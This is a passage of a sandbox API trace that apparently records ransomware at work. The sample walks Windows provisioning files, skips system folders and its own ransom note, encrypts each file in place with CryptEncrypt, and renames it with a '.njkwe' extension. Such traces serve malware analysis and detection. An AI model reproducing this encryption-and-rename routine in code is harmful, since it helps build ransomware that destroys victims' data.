(lpString1="249__Connections_Cellular_CTM (Macao SAR)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.630] lstrcmpW (lpString1="249__Connections_Cellular_CTM (Macao SAR)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.630] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\249__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.630] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\249__Connections_Cellular_CTM (Macao SAR)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\249__connections_cellular_ctm (macao sar)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.630] GetTickCount () returned 0x1153bdc [0077.630] GetTickCount () returned 0x1153bdc [0077.630] GetTickCount () returned 0x1153bdc [0077.630] GetTickCount () returned 0x1153bdc [0077.630] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.630] GetProcessHeap () returned 0xbe0000 [0077.630] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.630] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2c5, lpOverlapped=0x0) returned 1 [0077.658] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd3b, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.658] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2c5, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2c5, lpOverlapped=0x0) returned 1 [0077.659] GetProcessHeap () returned 0xbe0000 [0077.659] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.659] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.659] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.659] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.659] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.659] CloseHandle (hObject=0x43c) returned 1 [0077.659] GetProcessHeap () returned 0xbe0000 [0077.659] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.659] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\249__Connections_Cellular_CTM (Macao SAR)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 179 [0077.659] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\249__Connections_Cellular_CTM (Macao SAR)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\249__connections_cellular_ctm (macao sar)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\249__Connections_Cellular_CTM (Macao SAR)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\249__connections_cellular_ctm (macao sar)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.660] GetProcessHeap () returned 0xbe0000 [0077.660] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.660] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x901892f8, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x901892f8, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x901892f8, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x1d3, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="24__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", cAlternateFileName="24__CE~1.PRO")) returned 1 [0077.660] lstrcmpiW (lpString1="24__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="Windows") returned -1 [0077.660] lstrcmpiW (lpString1="24__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="$Recycle.bin") returned 1 [0077.660] lstrcmpiW (lpString1="24__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="System Volume Information") returned -1 [0077.660] lstrcmpiW (lpString1="24__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="Program Files") returned -1 [0077.660] lstrcmpiW (lpString1="24__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="Program Files (x86)") returned -1 [0077.660] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\24__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml") returned 161 [0077.660] StrStrIW (lpFirst="24__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpSrch=".njkwe") returned 0x0 [0077.660] lstrcmpW (lpString1="24__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.660] lstrcmpW (lpString1="24__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml", lpString2="taridd") returned -1 [0077.660] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\24__Cellular_", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.660] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\24__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\24__cellular_persimsettings_$(__iccid)_accountexperienceurl.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.668] GetTickCount () returned 0x1153bfc [0077.668] GetTickCount () returned 0x1153bfc [0077.668] GetTickCount () returned 0x1153bfc [0077.668] GetTickCount () returned 0x1153bfc [0077.668] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.668] GetProcessHeap () returned 0xbe0000 [0077.668] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.669] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x1d3, lpOverlapped=0x0) returned 1 [0077.669] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffe2d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.670] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x1d3, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x1d3, lpOverlapped=0x0) returned 1 [0077.670] GetProcessHeap () returned 0xbe0000 [0077.670] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.670] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.670] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.670] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.671] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.671] CloseHandle (hObject=0x43c) returned 1 [0077.671] GetProcessHeap () returned 0xbe0000 [0077.671] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.671] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\24__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml_r00t_{3sXlE5}.njkwe") returned 181 [0077.671] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\24__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\24__cellular_persimsettings_$(__iccid)_accountexperienceurl.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\24__Cellular_PerSimSettings_$(__ICCID)_AccountExperienceURL.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\24__cellular_persimsettings_$(__iccid)_accountexperienceurl.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.671] GetProcessHeap () returned 0xbe0000 [0077.671] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.671] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9096f33b, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9096f33b, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9096f33b, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x283, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="250__Connections_Cellular_CTM (Macao SAR)_i0$(__MVID)@WAP.provxml", cAlternateFileName="250__C~1.PRO")) returned 1 [0077.672] lstrcmpiW (lpString1="250__Connections_Cellular_CTM (Macao SAR)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.672] lstrcmpiW (lpString1="250__Connections_Cellular_CTM (Macao SAR)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.672] lstrcmpiW (lpString1="250__Connections_Cellular_CTM (Macao SAR)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.672] lstrcmpiW (lpString1="250__Connections_Cellular_CTM (Macao SAR)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.672] lstrcmpiW (lpString1="250__Connections_Cellular_CTM (Macao SAR)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.672] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\250__Connections_Cellular_CTM (Macao SAR)_i0$(__MVID)@WAP.provxml") returned 159 [0077.672] StrStrIW (lpFirst="250__Connections_Cellular_CTM (Macao SAR)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.672] lstrcmpW (lpString1="250__Connections_Cellular_CTM (Macao SAR)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.672] lstrcmpW (lpString1="250__Connections_Cellular_CTM (Macao SAR)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.672] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\250__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.672] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\250__Connections_Cellular_CTM (Macao SAR)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\250__connections_cellular_ctm (macao sar)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.672] GetTickCount () returned 0x1153c0b [0077.672] GetTickCount () returned 0x1153c0b [0077.672] GetTickCount () returned 0x1153c0b [0077.672] GetTickCount () returned 0x1153c0b [0077.672] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.672] GetProcessHeap () returned 0xbe0000 [0077.672] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.672] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x283, lpOverlapped=0x0) returned 1 [0077.674] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd7d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.674] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x283, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x283, lpOverlapped=0x0) returned 1 [0077.674] GetProcessHeap () returned 0xbe0000 [0077.674] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.674] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.674] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.674] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.674] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.674] CloseHandle (hObject=0x43c) returned 1 [0077.675] GetProcessHeap () returned 0xbe0000 [0077.675] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.675] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\250__Connections_Cellular_CTM (Macao SAR)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 179 [0077.675] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\250__Connections_Cellular_CTM (Macao SAR)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\250__connections_cellular_ctm (macao sar)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\250__Connections_Cellular_CTM (Macao SAR)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\250__connections_cellular_ctm (macao sar)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.675] GetProcessHeap () returned 0xbe0000 [0077.675] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.675] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9096f33b, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9096f33b, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9096f33b, ftLastWriteTime.dwHighDateTime=0x1d2e96f, nFileSizeHigh=0x0, nFileSizeLow=0x2d1, dwReserved0=0x1, dwReserved1=0x8000000, cFileName="251__Connections_Cellular_Hutchison - 3 (Macao SAR)_i0$(__MVID)@WAP.provxml", cAlternateFileName="251__C~1.PRO")) returned 1 [0077.675] lstrcmpiW (lpString1="251__Connections_Cellular_Hutchison - 3 (Macao SAR)_i0$(__MVID)@WAP.provxml", lpString2="Windows") returned -1 [0077.675] lstrcmpiW (lpString1="251__Connections_Cellular_Hutchison - 3 (Macao SAR)_i0$(__MVID)@WAP.provxml", lpString2="$Recycle.bin") returned 1 [0077.675] lstrcmpiW (lpString1="251__Connections_Cellular_Hutchison - 3 (Macao SAR)_i0$(__MVID)@WAP.provxml", lpString2="System Volume Information") returned -1 [0077.675] lstrcmpiW (lpString1="251__Connections_Cellular_Hutchison - 3 (Macao SAR)_i0$(__MVID)@WAP.provxml", lpString2="Program Files") returned -1 [0077.675] lstrcmpiW (lpString1="251__Connections_Cellular_Hutchison - 3 (Macao SAR)_i0$(__MVID)@WAP.provxml", lpString2="Program Files (x86)") returned -1 [0077.676] wnsprintfW (in: pszDest=0xc46ed8, cchDest=512, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\251__Connections_Cellular_Hutchison - 3 (Macao SAR)_i0$(__MVID)@WAP.provxml") returned 169 [0077.676] StrStrIW (lpFirst="251__Connections_Cellular_Hutchison - 3 (Macao SAR)_i0$(__MVID)@WAP.provxml", lpSrch=".njkwe") returned 0x0 [0077.676] lstrcmpW (lpString1="251__Connections_Cellular_Hutchison - 3 (Macao SAR)_i0$(__MVID)@WAP.provxml", lpString2="---==%$$$OPEN_ME_UP$$$==---.txt") returned 1 [0077.676] lstrcmpW (lpString1="251__Connections_Cellular_Hutchison - 3 (Macao SAR)_i0$(__MVID)@WAP.provxml", lpString2="taridd") returned -1 [0077.676] StrCmpNW (lpStr1="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\251__Connecti", lpStr2="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\jQ9oAfjNQKea58w4CPypJ91GQq5vB", nChar=107) returned -1 [0077.676] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\251__Connections_Cellular_Hutchison - 3 (Macao SAR)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\251__connections_cellular_hutchison - 3 (macao sar)_i0$(__mvid)@wap.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x43c [0077.676] GetTickCount () returned 0x1153c0b [0077.676] GetTickCount () returned 0x1153c0b [0077.676] GetTickCount () returned 0x1153c0b [0077.676] GetTickCount () returned 0x1153c0b [0077.676] CryptEncrypt (in: hKey=0xbfdd18, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x2c, dwBufLen=0x80 | out: pbData=0x380ed10*, pdwDataLen=0x380edc0*=0x80) returned 1 [0077.676] GetProcessHeap () returned 0xbe0000 [0077.676] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x2800) returned 0xc51868 [0077.676] ReadFile (in: hFile=0x43c, lpBuffer=0xc51868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesRead=0x380edc4*=0x2d1, lpOverlapped=0x0) returned 1 [0077.678] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0xfffffd2f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0077.678] WriteFile (in: hFile=0x43c, lpBuffer=0xc51868*, nNumberOfBytesToWrite=0x2d1, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc51868*, lpNumberOfBytesWritten=0x380edc4*=0x2d1, lpOverlapped=0x0) returned 1 [0077.678] GetProcessHeap () returned 0xbe0000 [0077.678] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc51868 | out: hHeap=0xbe0000) returned 1 [0077.678] SetFilePointerEx (in: hFile=0x43c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0077.678] WriteFile (in: hFile=0x43c, lpBuffer=0xc09940*, nNumberOfBytesToWrite=0x300, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0xc09940*, lpNumberOfBytesWritten=0x380edc4*=0x300, lpOverlapped=0x0) returned 1 [0077.678] WriteFile (in: hFile=0x43c, lpBuffer=0x380ed10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x380ed10*, lpNumberOfBytesWritten=0x380edc4*=0x80, lpOverlapped=0x0) returned 1 [0077.678] WriteFile (in: hFile=0x43c, lpBuffer=0x40603c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x380edc4, lpOverlapped=0x0 | out: lpBuffer=0x40603c*, lpNumberOfBytesWritten=0x380edc4*=0x4, lpOverlapped=0x0) returned 1 [0077.678] CloseHandle (hObject=0x43c) returned 1 [0077.678] GetProcessHeap () returned 0xbe0000 [0077.678] RtlAllocateHeap (HeapHandle=0xbe0000, Flags=0x8, Size=0x400) returned 0xc472e0 [0077.678] wnsprintfW (in: pszDest=0xc472e0, cchDest=512, pszFmt="%s_%S_{%6S}%s" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\251__Connections_Cellular_Hutchison - 3 (Macao SAR)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe") returned 189 [0077.678] MoveFileW (lpExistingFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\251__Connections_Cellular_Hutchison - 3 (Macao SAR)_i0$(__MVID)@WAP.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\251__connections_cellular_hutchison - 3 (macao sar)_i0$(__mvid)@wap.provxml"), lpNewFileName="\\\\?\\C:\\ProgramData\\Microsoft\\Provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\Prov\\RunTime\\251__Connections_Cellular_Hutchison - 3 (Macao SAR)_i0$(__MVID)@WAP.provxml_r00t_{3sXlE5}.njkwe" (normalized: "c:\\programdata\\microsoft\\provisioning\\{c8a326e4-f518-4f14-b543-97a57e1a975e}\\prov\\runtime\\251__connections_cellular_hutchison - 3 (macao sar)_i0$(__mvid)@wap.provxml_r00t_{3sxle5}.njkwe")) returned 1 [0077.679] GetProcessHeap () returned 0xbe0000 [0077.679] HeapFree (in: hHeap=0xbe0000, dwFlags=0x8, lpMem=0xc472e0 | out: hHeap=0xbe0000) returned 1 [0077.679] FindNextFileW (in: hFindFile=0xc19f20, lpFindFileData=0x380ee00 | out: lpFindFileData=0x380ee00*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9096f33b, ftCreationTime.dwHighDateTime=0x1d2e96f, ftLastAccessTime.dwLowDateTime=0x9096f33b, ftLastAccessTime.dwHighDateTime=0x1d2e96f, ftLastWriteTime.dwLowDateTime=0x9096f33b, ftLastWriteTime.dwHighDateTime=0x1d2e96f, 